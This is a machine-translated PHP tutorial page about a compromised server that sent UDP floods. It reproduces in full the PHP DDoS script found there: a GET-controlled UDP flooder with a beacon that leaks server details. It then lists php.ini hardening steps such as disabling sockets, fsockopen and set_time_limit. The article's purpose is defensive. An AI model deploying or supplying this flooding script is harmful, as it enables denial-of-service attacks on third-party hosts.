Solution to php ddos attack, php ddos attack_PHP tutorial-PHP Tutorial-php.cn

Solution to php ddos attack, php ddos attack_PHP tutorial

WBOY

Release： 2016-07-13 10:10:07

Original

1332 people have browsed it

php ddos attack solution, phpddos attack

The example in this article describes the solution to Ddos attack in PHP. Share it with everyone for your reference. The specific analysis is as follows:

Today, one of my machines suddenly sent a large number of data packets to the outside world, which could reach more than 1G per second. Although I used a policy to prohibit UDP packets, they could not be sent out, but it took up a lot of cup, so I finally found a way to solve it. .

Look at the source code first, the code is as follows:

Copy code The code is as follows:

set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
If (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE' ].$_GET['rat'];
exit;
                                                             echo "Parameters can not be empty!";
exit;
}

for($i=0;$i<$Sendlen;$i++){
          $out .= "A";
}

$max_time = time()+$exec_time;

while(1){
$packets++;
If(time() > $max_time){
         break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
            if($fp){
                    fwrite($fp, $out);
                  fclose($fp);
}
}

echo "Send Host：$host:$port

";
echo "Send Flow: $packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb

";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

The key code is as follows:

Copy code The code is as follows:

$fp = fsockopen("udp://$ip", $rand, $errno, $ errstr, 5);

The method is very simple. Send a UDP packet to the target host and define an infinite loop, which will create greater pressure.

This pressure is on the server that executes this script, because it first consumes a lot of its own network bandwidth, CPU and other resources. If you want to use this script to put pressure on the target site, you need to execute it on multiple servers. This script, DDOS, since it uses fsockopen to request external requests, then it is not allowed to request.

Set in php.ini, the code is as follows:

Copy code The code is as follows:

allow_url_fopen = Off

If he can still send the package in this way, the code is as follows:

extension=php_sockets.dll

changed to

;extension=php_sockets.dll

Restart APACHE, IIS, and NGINX to prevent PHP DDOS from sending packages.

In addition, some netizens said that it is very simple to disable the setting of scripts to no timeout:

1. Disable the set_time_limit function

2. Enable PHP’s safe mode (safe_mode=on).

To disable the socket function, you can directly disable all socket modules or disable the fsockopen function. It is recommended that since socket is often used to send emails to retrieve passwords, it is recommended to directly enable the safe mode. However, in this case, the script will time out every 30 seconds. , I guess no "hacker" is lonely enough to click to start DDOS every 30 seconds.

Experience:This kind of problem is usually caused by website security. We should pay attention to the security of the website and the security of the server, so that it is not easy to be invaded. If you know how to use macofee friends, you can check the website. It would be better to limit it.

I hope this article will be helpful to everyone’s PHP programming design.